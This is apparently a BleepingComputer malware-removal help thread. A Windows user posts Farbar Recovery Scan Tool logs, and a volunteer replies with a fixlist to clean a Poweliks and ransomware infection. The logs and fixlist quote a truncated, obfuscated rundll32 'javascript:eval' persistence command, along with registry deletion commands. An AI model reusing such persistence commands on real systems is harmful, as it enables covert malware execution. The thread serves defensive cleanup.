2013-01-11 18:27 - 2013-01-11 18:27 - 00172544 _____ () C:\windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\72d7ad1c7236c618e32950b49869a26b\IsdiInterop.ni.dll
2011-12-01 10:49 - 2011-10-17 15:08 - 00059904 _____ () C:\Program Files\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/10/2014 03:03:21 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies - Update 'Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
 
Error: (09/10/2014 03:03:21 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.
 
Error: (09/09/2014 11:10:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x1fb0
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 09:49:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x1f14
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 08:35:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x1b04
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 07:45:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0xba8
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 07:20:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc6
Faulting process id: 0x15bc
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 07:00:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x1134
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 04:59:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x10f0
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
Error: (09/09/2014 04:50:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100
Faulting module name: ieframe.dll, version: 9.0.8112.16476, time stamp: 0x5126ea2b
Exception code: 0xc0000005
Fault offset: 0x0000ccc9
Faulting process id: 0x14b8
Faulting application start time: 0xsvchost.exe0
Faulting application path: svchost.exe1
Faulting module path: svchost.exe2
Report Id: svchost.exe3
 
 
System errors:
=============
Error: (09/10/2014 05:35:01 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/10/2014 03:24:05 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.183.2032.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.5.0216.00
 
Source Path: 4.5.0216.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (09/10/2014 03:03:53 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Microsoft Office PowerPoint 2007 (KB2596764).
 
Error: (09/10/2014 03:03:53 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x8024200d: Windows 7 Service Pack 1 (KB976932).
 
Error: (09/09/2014 03:11:29 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/09/2014 02:59:31 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/09/2014 02:40:10 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
 
Microsoft Office Sessions:
=========================
Error: (09/10/2014 03:03:21 AM) (Source: MsiInstaller) (EventID: 1024) (User: NT AUTHORITY)
Description: Microsoft Office 2007 Primary Interop AssembliesSecurity Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition1603(NULL)(NULL)(NULL)
 
Error: (09/10/2014 03:03:21 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Office 2007 Primary Interop Assemblies -- Please install Microsoft Office 2007 before installing this product.(NULL)(NULL)(NULL)(NULL)(NULL)
 
Error: (09/09/2014 11:10:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005000000001fb001cfcc3d9471c32eC:\windows\System32\svchost.exeunknown67e612c7-3833-11e4-9616-00266c867412
 
Error: (09/09/2014 09:49:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc91f1401cfcc333df3f2d2C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll28febcec-3828-11e4-9616-00266c867412
 
Error: (09/09/2014 08:35:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005000000001b0401cfcc23987382a3C:\windows\System32\svchost.exeunknownd28b6b52-381d-11e4-9616-00266c867412
 
Error: (09/09/2014 07:45:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc9ba801cfcc203e1fd0a5C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dllc4844b3b-3816-11e4-9616-00266c867412
 
Error: (09/09/2014 07:20:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc615bc01cfcc1d4f1638b6C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll3e1a6336-3813-11e4-9616-00266c867412
 
Error: (09/09/2014 07:00:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc9113401cfcc14ed3ddaf3C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll7429f071-3810-11e4-9616-00266c867412
 
Error: (09/09/2014 04:59:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc910f001cfcc0b25b921e2C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll9777e03b-37ff-11e4-9616-00266c867412
 
Error: (09/09/2014 04:50:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe6.1.7600.163854a5bc100ieframe.dll9.0.8112.164765126ea2bc00000050000ccc914b801cfcc087e252df8C:\windows\System32\svchost.exeC:\Windows\System32\ieframe.dll534e5815-37fe-11e4-9616-00266c867412
 
 
CodeIntegrity Errors:
===================================
  Date: 2011-12-21 08:59:48.259
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.229
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.179
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.139
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:48.049
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.999
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.959
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\cryptnet.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2011-12-21 08:59:47.869
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Norton 360 Premier Edition\Engine\5.1.0.29\coieplg.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Percentage of memory in use: 62%
Total physical RAM: 3061.86 MB
Available physical RAM: 1138.73 MB
Total Pagefile: 6122 MB
Available Pagefile: 3892.45 MB
Total Virtual: 2047.88 MB
Available Virtual: 1894.05 MB
 
==================== Drives ================================
 
Drive c: (S3A8572D009) (Fixed) (Total:583.02 GB) (Free:540.74 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 596.2 GB) (Disk ID: 9BD1B9BA)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=583 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=17)
 
==================== End Of Log ============================


Yeah, so I was getting error messages whenever I tried to post the thread. So I just kept trying. That was stupid. My bad, I've reported all my own threads.
Mod Edit:  I deleted all duplicates - Hamluis.

 

Edited by hamluis, 10 September 2014 - 07:00 AM.


BC AdBot (Login to Remove)

 


#2 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 10 September 2014 - 08:22 AM

Hello  tantryl and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

 

My name is Yılmaz and I'll help you with the cleanup of malware from your computer.

Before we move on, please read the following points carefully.
 

  • Please complete all steps in the specified order.
  • Even if tools don't find malware, I want you to post the logfiles anyway.
  • Please copy and paste the logfiles directly into your posts. Please do not attach them unless you are instructed to do so.
  • Read the instructions carefully. If you have problems, stop what you  were doing and describe the problems you encountered as precisely as  you can.
  • Don't install or uninstall software during the cleanup unless you are told to do so.
  • If you can't answer for the next few days, please let me know. If  you haven't answered within 5 days, I am assuming that you don't need  help anymore and your topic will be closed.
  • I can not guarantee that we will find and be able to remove all  malware. The cleaning process is not instant. Please continue to review  my answers until I tell you that your computer is clean
  • Please reply to this thread. Do not start a new topic
  • As my first language is not English, please do not use slang or idioms. It could be hard for me to understand.

 

  • Please open as administrator  the computer. How is open as administrator  the computer?
  • Disable your AntiVirus and AntiSpyware applications, as they will  interfere with our tools and the removal. If you are unsure how to do  this, please refer to get help here

Thanks

 

---------------------------------------------------------------------------------------------------------------------------

 

 I am currently reviewing your log.I will be back with a fix for your problem as soon as possible.Please be patient with me during this time.

 

 

Best regards


Edited by olgun52, 10 September 2014 - 08:24 AM.

Best regards
 
paypal.gif
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#3 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 10 September 2014 - 10:52 AM

Hello tantryl,

 

Please run the following for me.

Farbar's Recovery Scan Tool
For this step you will need a USB flash drive.

  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it on the flashdrive as fixlist.txt
start
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...\Run: [.tluafed** <*>] => C:\Users\hesperia\Application Data\{00006159-2247-321A-78CD-B6B14BD17071}.ex <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
S1 ajvytjcn; \??\C:\windows\system32\drivers\ajvytjcn.sys [X]
S1 ezgvvduv; \??\C:\windows\system32\drivers\ezgvvduv.sys [X]
S1 hijfosmh; \??\C:\windows\system32\drivers\hijfosmh.sys [X]
S1 ivhuifer; \??\C:\windows\system32\drivers\ivhuifer.sys [X]
S1 kmsjshbz; \??\C:\windows\system32\drivers\kmsjshbz.sys [X]
S1 lnsgscfl; \??\C:\windows\system32\drivers\lnsgscfl.sys [X]
S1 pluzxczp; \??\C:\windows\system32\drivers\pluzxczp.sys [X]
S1 qozzqzgr; \??\C:\windows\system32\drivers\qozzqzgr.sys [X]
S3 Tosrfcom; No ImagePath
FF Plugin: @microsoft.com/GENUINE -> disabled No File
C:\Users\hesperia\AppData\Roaming\Awyhvya
C:\Users\hesperia\AppData\Roaming\Usleabo
C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe
C:\ProgramData\DECRYPT_INSTRUCTION.HTML
C:\ProgramData\DECRYPT_INSTRUCTION.TXT
C:\ProgramData\DECRYPT_INSTRUCTION.URL
C:\Users\hesperia\AppData\Roaming\sRaiGGih
C:\Users\hesperia\AppData\Local\Temp\Quarantine.exe
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
deletekey: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32
REG: reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /ve /f
REG: reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /v a /f
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
EmptyTemp:
end
  • Plug the flashdrive into the infected PC and follow the 2 step process below to enter the System Recovery Options using one of the three options listed, then running Farbar's Recover Scan Tool

----------

Entering into the System Recovery Options

Option :step1:

To enter System Recovery Options in Windows 8:

Option :step2:

To enter System Recovery Options from the Advanced Boot Options:

  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Select English as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.

Option :step3:

To enter System Recovery Options by using Windows installation disc:

  • Insert the installation disc.
  • Restart your computer.
  • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
  • Click Repair your computer.
  • Select English as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next

----------

Running Farbar's Recovery Scan Tool in System Recovery

  • Once you are in the System Recovery Options menu you will get the following options:

Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt

  • Select Command Prompt
  • In the command window type in Notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select Computer and find your flash drive letter and close the notepad.
  • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
    • Note: Replace letter e with the drive letter of your flash drive.
  • When the tool opens click Yes to disclaimer.
  • Press Fix button.
  • It will make a log (fixlog.txt) on the flash drive. Please copy and paste it to your reply.
  • Attempt to reboot your computer into Normal (or Safe) Mode and check the performance
  • If you are able to boot, rerun FRST making sure to place a check mark in Addition.txt

*****************************************************************************

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.

  • Does your computer boot properly?
  • FRST report(s)

 

Best regards.

 


Best regards
 
paypal.gif
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#4 tantryl

tantryl
  • Topic Starter

  • Members
  • 31 posts
  • OFFLINE
  •  
  • Local time:05:04 PM

Posted 11 September 2014 - 12:16 AM

Thanks olgun52. I'm not in front of the PC (you probably saw TeamViewer in the process list) but can be either in a few hours or tomorrow so I'll do that then and report back.



#5 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 11 September 2014 - 04:54 AM

OK. Thank you for the information.

 

Have a nice day.


Best regards
 
paypal.gif
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#6 tantryl

tantryl
  • Topic Starter

  • Members
  • 31 posts
  • OFFLINE
  •  
  • Local time:05:04 PM

Posted 12 September 2014 - 02:19 AM

Looks a lot better although the last two things in "Registry (Whitelisted)" seem bad to me. Probably worth noting: although I asked them to leave the computer off they decided to use it and leave it on and on the internet. So the thing could've updated/reinstalled/whatevered itself.

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 10-09-2014
Ran by SYSTEM at 2014-09-12 15:09:01 Run:1
Running from F:\
Boot Mode: Recovery
 
==============================================
 
Content of fixlist:
*****************
start
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...\Run: [.tluafed** <*>] => C:\Users\hesperia\Application Data\{00006159-2247-321A-78CD-B6B14BD17071}.ex <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
S1 ajvytjcn; \??\C:\windows\system32\drivers\ajvytjcn.sys [X]
S1 ezgvvduv; \??\C:\windows\system32\drivers\ezgvvduv.sys [X]
S1 hijfosmh; \??\C:\windows\system32\drivers\hijfosmh.sys [X]
S1 ivhuifer; \??\C:\windows\system32\drivers\ivhuifer.sys [X]
S1 kmsjshbz; \??\C:\windows\system32\drivers\kmsjshbz.sys [X]
S1 lnsgscfl; \??\C:\windows\system32\drivers\lnsgscfl.sys [X]
S1 pluzxczp; \??\C:\windows\system32\drivers\pluzxczp.sys [X]
S1 qozzqzgr; \??\C:\windows\system32\drivers\qozzqzgr.sys [X]
S3 Tosrfcom; No ImagePath
FF Plugin: @microsoft.com/GENUINE -> disabled No File
C:\Users\hesperia\AppData\Roaming\Awyhvya
C:\Users\hesperia\AppData\Roaming\Usleabo
C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe
C:\ProgramData\DECRYPT_INSTRUCTION.HTML
C:\ProgramData\DECRYPT_INSTRUCTION.TXT
C:\ProgramData\DECRYPT_INSTRUCTION.URL
C:\Users\hesperia\AppData\Roaming\sRaiGGih
C:\Users\hesperia\AppData\Local\Temp\Quarantine.exe
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
deletekey: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32
REG: reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /ve /f
REG: reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /v a /f
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml:OECustomProperty
AlternateDataStreams: C:\Users\hesperia\Documents\Invites.eml:OECustomProperty
EmptyTemp:
end
*****************
 
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\Software\Microsoft\Windows\CurrentVersion\Run\\.tluafed** <*> => Value could not be deleted.Error getting handle(2): -1073741772
HKU\S-1-5-21-931387415-1679961563-2565028958-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! => Error: The entry should be fixed outside recovery mode.
ajvytjcn => Service deleted successfully.
ezgvvduv => Service deleted successfully.
hijfosmh => Service deleted successfully.
ivhuifer => Service deleted successfully.
kmsjshbz => Service deleted successfully.
lnsgscfl => Service deleted successfully.
pluzxczp => Service deleted successfully.
qozzqzgr => Service deleted successfully.
Tosrfcom => Service deleted successfully.
FF Plugin: @microsoft.com/GENUINE -> disabled No File => Error: The entry should be fixed outside recovery mode.
C:\Users\hesperia\AppData\Roaming\Awyhvya => Moved successfully.
C:\Users\hesperia\AppData\Roaming\Usleabo => Moved successfully.
C:\Users\hesperia\AppData\Roaming\{00006159-2247-321A-78CD-B6B14BD17071}.exe => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.URL => Moved successfully.
C:\Users\hesperia\AppData\Roaming\sRaiGGih => Moved successfully.
"C:\Users\hesperia\AppData\Local\Temp\Quarantine.exe" => File/Directory not found.
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? => Error: The entry should be fixed outside recovery mode.
HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 => Key not found.
 
========= reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /ve /f =========
 
ERROR: The system was unable to find the specified registry key or value.
 
 
========= End of Reg: =========
 
 
========= reg delete HKU\S-1-5-21-1352587762-2721446372-875723024-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 /v a /f =========
 
ERROR: The system was unable to find the specified registry key or value.
 
 
========= End of Reg: =========
 
C:\Users\hesperia\Documents\failure notice.eml => ":OECustomProperty" ADS removed successfully.
C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml => ":OECustomProperty" ADS removed successfully.
C:\Users\hesperia\Documents\Invites.eml => ":OECustomProperty" ADS removed successfully.
EmptyTemp: => Error: This directive works only outside recovery mode.
 
==== End of Fixlog ====
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-09-2014
Ran by hesperia (administrator) on HESPERIA-PC on 12-09-2014 15:12:54
Running from E:\
Platform: Microsoft Windows 7 Home Premium  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
